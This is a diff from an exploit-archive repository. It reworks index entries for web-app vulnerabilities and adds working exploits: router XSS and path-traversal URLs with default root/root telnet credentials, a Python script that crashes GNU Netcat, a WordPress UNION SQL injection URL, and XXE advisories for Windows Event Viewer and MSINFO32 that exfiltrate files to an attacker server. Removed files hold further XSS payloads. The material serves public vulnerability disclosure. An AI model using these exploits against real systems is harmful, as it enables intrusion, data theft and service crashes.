1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0 -26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 -26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 -26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26592,platforms/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26593,platforms/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 +26594,platforms/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection",2005-11-25,retrogod@aliceposta.it,php,webapps,0 26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,php,webapps,0 26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0 26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 @@ -28676,7 +28683,7 @@ id,file,description,date,author,platform,type,port 27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 -27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27052,platforms/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0 @@ -28749,7 +28756,6 @@ id,file,description,date,author,platform,type,port 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.asp SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 -27152,platforms/php/webapps/27152.txt,"BrowserCRM - results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 @@ -29383,7 +29389,7 @@ id,file,description,date,author,platform,type,port 28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion",2006-06-13,R@1D3N,php,webapps,0 28017,platforms/php/webapps/28017.txt,"CEScripts - Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0 28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injections",2006-06-13,"CrAzY CrAcKeR",php,webapps,0 -28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - Wap_short_news.php Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 +28019,platforms/php/webapps/28019.txt,"Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 @@ -29553,7 +29559,7 @@ id,file,description,date,author,platform,type,port 28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 +28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 @@ -29862,9 +29868,9 @@ id,file,description,date,author,platform,type,port 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 -28732,platforms/php/webapps/28732.txt,"Yblog - funk.php id Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 -28733,platforms/php/webapps/28733.txt,"Yblog - tem.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 -28734,platforms/php/webapps/28734.txt,"Yblog - uss.php action Parameter Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 +28732,platforms/php/webapps/28732.txt,"Yblog - 'funk.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 +28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 +28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 @@ -29967,8 +29973,8 @@ id,file,description,date,author,platform,type,port 28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Inclusion",2006-10-24,Crackers_Child,php,webapps,0 28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0 28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.asp SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0 -28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 -28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 +28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 +28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 @@ -30212,7 +30218,7 @@ id,file,description,date,author,platform,type,port 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 -29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 +29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 @@ -30945,8 +30951,8 @@ id,file,description,date,author,platform,type,port 30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - showuser who Parameter Cross-Site Scripting",2007-07-14,"Christopher Schwardt",php,webapps,0 30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR - TakeProfEdit.php HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - Philboard_forum.asp SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 -30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 -30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 +30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 +30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 @@ -31140,8 +31146,8 @@ id,file,description,date,author,platform,type,port 30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0 30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - admin/emoticonlist.php l_emoticonlist Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 -30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 -30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 +30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0 30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 @@ -34657,13 +34663,13 @@ id,file,description,date,author,platform,type,port 36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 -36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +40870,platforms/php/webapps/40870.txt,"Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0 +36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0 36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0 diff --git a/platforms/php/webapps/5775.txt b/platforms/asp/webapps/5775.txt similarity index 100% rename from platforms/php/webapps/5775.txt rename to platforms/asp/webapps/5775.txt diff --git a/platforms/hardware/remote/16275.txt b/platforms/hardware/remote/16275.txt index 3c25a6641..8d3229bd6 100755 --- a/platforms/hardware/remote/16275.txt +++ b/platforms/hardware/remote/16275.txt @@ -188,7 +188,7 @@ Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting) 1 root S 280 0 0.0 1.9 init # echo * ## ls o.O?!? bin dev etc lib linuxrc mnt proc sbin usr var webs -# </textarea> +#
  • diff --git a/platforms/hardware/remote/40867.txt b/platforms/hardware/remote/40867.txt new file mode 100755 index 000000000..9bd9bf01d --- /dev/null +++ b/platforms/hardware/remote/40867.txt @@ -0,0 +1,30 @@ +###################### +# Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities +# Version: Gan9.8U6X-B-TW-R1B020_1T1RP +# Exploit Author : Persian Hack Team +# Tested on [ Win ] +# Date 2016/12/05 +###################### + +1. Cross Site Scripting + +PoC : First We Need To login To Panel And page Parameter Vulnerable to Cross Site Scripting +http://192.168.1.1/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E + + +2. Default Telnet Root Password.txt + +PoC : Username:root Password:root + +telnet 192.168.1.1 +(none) login: root +Password:root +~ $ cat /proc/version +Linux version 2.6.19 (dsl@crlinux) (gcc version 3.4.6-1.3.6) #3 Fri May 18 13:09:57 CST 2012 + + +3. Directory Traversal.txt + +PoC : First We Need To login To Panel And getpage Parameter Vulnerable to Local File Disclosure +http://192.168.1.1/cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page= + diff --git a/platforms/hardware/webapps/25968.pl b/platforms/hardware/webapps/25968.pl index cf9c19721..0dc815cc8 100755 --- a/platforms/hardware/webapps/25968.pl +++ b/platforms/hardware/webapps/25968.pl @@ -33,7 +33,7 @@ while(1){ if($file eq ""){ print "Enter full path to file!\n"; } $data=get($bug) || die "$!, try another exploit\n"; $data =~ s/Null/File not found!/gs; - if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){ + if (defined $data =~ m{rows="30">(.*?)}sx){ print $1."\n"; }} sub usg diff --git a/platforms/linux/dos/40866.py b/platforms/linux/dos/40866.py new file mode 100755 index 000000000..1582f4cfc --- /dev/null +++ b/platforms/linux/dos/40866.py @@ -0,0 +1,78 @@ +#/usr/bin/python +#-*- Coding: utf-8 -*- + +### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ### + +# Date: 2016-11-19 +# Exploit Author: n30m1nd +# Vendor Homepage: http://netcat.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download +# Version: 0.7.1 +# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux + +# Credits +# ======= +# Props to Giovanni and Armando creators of this useful piece of software, thank you guys! +# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE! + +# How to +# ====== +# * Get a distribution that ships with gnu netcat or Compile netcat from sources: +# * # Download +# * tar -xzf netcat-0.7.1.tar.gz +# * cd netcat-0.7.1/ +# * ./configure +# * make +# * # Netcat will be deployed in src/netcat +# +# * Set netcat to listen like the following: +# * ./netcat -nlvp 12347 -T +# * Just run this script on a different terminal +# + +# Why? +# ==== +# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes +# by running them through buggy switch/case code. +# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write. + +# Vulnerable code +# =============== +# telnet.c +# ... +# 76 static unsigned char getrq[4]; +# 77 static int l = 0; +# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos; +# ... +# 88 /* loop all chars of the string */ +# 89 for (i = 0; i < ref_size; i++) { +# 90 /* if we found IAC char OR we are fetching a IAC code string process it */ +# 91 if ((buf[i] != TELNET_IAC) && (l == 0)) +# ... +#100 getrq[l++] = buf[i]; // BANG! +# 99 /* copy the char in the IAC-code-building buffer */ +# ... +# 76 static unsigned char getrq[4]; +# 77 static int l = 0; +# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos; + +# Exploit code +# ============ + +import socket + +RHOST = "127.0.0.1" +RPORT = 12347 + +print("[+] Connecting to %s:%d") % (RHOST, RPORT) +s = socket.create_connection((RHOST, RPORT)) +s.send("\xFF") # Telnet control character +print("[+] Telnet control character sent") +print("[i] Starting") +try: + i = 0 + while True: # Loop until it crashes + i += 1 + s.send("\x30") +except: + print("[+] GNU Netcat crashed on iteration: %d") % (i) diff --git a/platforms/php/webapps/27152.txt b/platforms/php/webapps/27152.txt deleted file mode 100755 index 95d4a0f6a..000000000 --- a/platforms/php/webapps/27152.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/16435/info - -BrowserCRM is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -http://www.example.com/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E \ No newline at end of file diff --git a/platforms/php/webapps/36452.txt b/platforms/php/webapps/36452.txt deleted file mode 100755 index 0b4dba146..000000000 --- a/platforms/php/webapps/36452.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/51060/info - -Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. - -Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. - -http://www.example.com/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/40870.txt b/platforms/php/webapps/40870.txt new file mode 100755 index 000000000..3e846a563 --- /dev/null +++ b/platforms/php/webapps/40870.txt @@ -0,0 +1,29 @@ +# Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection +# Date: 28/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/ +# Software Link: https://wordpress.org/plugins/simple-personal-message/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.0.3 +# Tested on: Windows 8 + +1 - Description: + +$_GET['message'] is not escaped. Is accessible for every registered user. + +http://lenonleite.com.br/en/blog/2016/12/05/single-personal-message-1-0-3-plugin-wordpress-sql-injection/ + +2 - Proof of Concept: + +1 - Login as regular user (created using wp-login.php?action=register): + +2 - Access url: + +http://target/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=0%20UNION%20SELECT%201,2.3,name,5,slug,7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1 + +3 - Timeline: + +28/11/2016 - Discovered +28/11/2016 - vendor notified \ No newline at end of file diff --git a/platforms/windows/local/40863.txt b/platforms/windows/local/40863.txt new file mode 100755 index 000000000..b71f718ee --- /dev/null +++ b/platforms/windows/local/40863.txt @@ -0,0 +1,126 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================= +www.microsoft.com + + + +Product: +======================== +Microsoft Event Viewer +Version: 1.0 + +The Windows Event Viewer shows a log of application and system messages – +errors, information messages, and warnings. + + +Vulnerability Type: +=================== +XML External Entity + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +Windows Event Viewer user can import 'Custom View' files, these files +contain XML, the parser processes External Entity potentially allowing +attackers +to gain remote file access to files on a victims system if user imports a +corrupt XML file via remote share/USB (or other untrusted source). + + + +Tested Windows 7 SP1 + + +Exploit code(s): +=============== + + +1) Go to Windows CL type 'eventvwr' to bring up Windows Event Viewer. +2) Action / Import Custom View +3) Import the malicious 'MyCustomView.xml' via remote share or USB for POC +4) Files are accessed and sent to remote server. + +User gets error like "The specified custom view is not valid" attacker gets +files! + + + +"payload.dtd" (host on attacker server) + + +"> +%all; + + +"MyCustomView.xml" (malicious windows Event Custom View XML) + + + + +%dtd;]> +&send; + + +Attacker server listener + +python -m SimpleHTTPServer 8080 + + + + +Disclosure Timeline: +===================================== +Vendor Notification: August 30, 2016 +Vendor reply: "does not meet the bar for security servicing." August 30, +2016 +December 4, 2016 : Public Disclosure + + + + +Exploitation Technique: +======================= +Remote + + + +Severity Level: +================ +High + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/windows/local/40864.txt b/platforms/windows/local/40864.txt new file mode 100755 index 000000000..3524ff065 --- /dev/null +++ b/platforms/windows/local/40864.txt @@ -0,0 +1,132 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================= +www.microsoft.com + + + +Product: +========================== +Windows System Information +MSINFO32.exe v6.1.7601 + + +Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system +components, and software environment. + +Parameters +FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file. + + + +Vulnerability Type: +=================== +XML External Entity + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack +which can potentially allow remote attackers to +gain access to and exfiltrate files from the victims computer if they open +a malicious ".nfo" file via remote share / USB etc. + +Upon open the file user will see error message like "System Information is +unable to open this .nfo file. The file might +be corrupt etc.. + + +Tested Windows 7 SP1 + + +Exploit code(s): +=============== + +Access and exfiltrate Windows "msdfmap.ini" file as trivial POC. +This file contains credentials for MS ADO Remote Data Services. + + +1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd) + + + +2) "payload.dtd" + + +"> +%all; + + + +3) "FindMeThatBiatch.nfo" (corrupt .NFO file) + + + + +%dtd;]> +&send; + + + +Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32 +opens... attacker gets files. + +OR open via Windows CL: +c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo + + + +Disclosure Timeline: +====================================== +Vendor Notification: September 4, 2016 +Vendor Reply "not meet the bar for security servicing": September 7, 2016 +December 4, 2016 : Public Disclosure + + + + +Exploitation Technique: +======================= +Remote + + + +Severity Level: +================ +High + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git 